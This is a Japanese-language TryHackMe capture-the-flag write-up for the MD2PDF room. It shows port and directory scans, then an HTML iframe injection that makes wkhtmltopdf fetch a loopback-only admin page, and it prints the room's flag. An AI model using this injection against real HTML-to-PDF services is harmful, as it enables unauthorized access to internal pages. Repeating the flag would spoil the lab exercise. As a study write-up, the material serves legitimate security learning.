[TryHackMe] MD2PDF #Writeup

Posted at 2024-08-03

はじめに

備忘録です。

What is the flag?

まずはnmap

$ nmap 10.10.222.148

Starting Nmap 7.60 ( https://nmap.org ) at 2024-08-03 01:21 BST
Nmap scan report for ip-10-10-222-148.eu-west-1.compute.internal (10.10.222.148)
Host is up (0.0014s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
5000/tcp open  upnp
MAC Address: 02:F0:D2:3F:BB:8B (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.96 seconds

三つ空いているのが確認できる。80ポートと5000ポートを見に行くとテキストを入力してpdfに変換するページが表示された。

gobusterで隠しディレクトリを探す。

$ gobuster dir -u http://10.10.222.148 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.222.148
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2024/08/03 01:23:51 Starting gobuster
===============================================================
/admin (Status: 403)
===============================================================
2024/08/03 01:23:54 Finished
===============================================================

5000ポートも見てみる。

$ gobuster dir -u http://10.10.222.148:5000 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.222.148:5000
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2024/08/03 01:27:24 Starting gobuster
===============================================================
/admin (Status: 403)
===============================================================
2024/08/03 01:27:27 Finished
===============================================================

どちらもadminページがあったが権限がなくて閲覧できなかった。

ここで詰まったが、PDFを生成してexiftoolで解析してみる。

$ exiftool document.pdf
ExifTool Version Number         : 10.80
File Name                       : document.pdf
Directory                       : .
File Size                       : 6.6 kB
File Modification Date/Time     : 2024:08:03 01:35:27+01:00
File Access Date/Time           : 2024:08:03 01:35:27+01:00
File Inode Change Date/Time     : 2024:08:03 01:35:27+01:00
File Permissions                : rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.4
Linearized                      : No
Title                           : 
Creator                         : wkhtmltopdf 0.12.5
Producer                        : Qt 4.8.7
Create Date                     : 2024:08:03 00:25:00Z
Page Count                      : 1

Createrにwkhtmltopdfと書いてあったので調べてみる。

htmlをpdfに変換してくれるプログラムみたい。

ならば、htmlインジェクションが使えそう。
iframe内にループバックアドレスからadminページのリンクをさせると、権限の問題が解決するのでは？？

<iframe src="http://127.0.0.1:5000/admin"></iframe>

ビンゴ！！
ここにフラグもあった。

flag{1f4a2b6ffeaf4707c43885d704eaee4b}

You get articles that match your needs
You can efficiently read back useful information
You can use dark theme

What you can do with signing up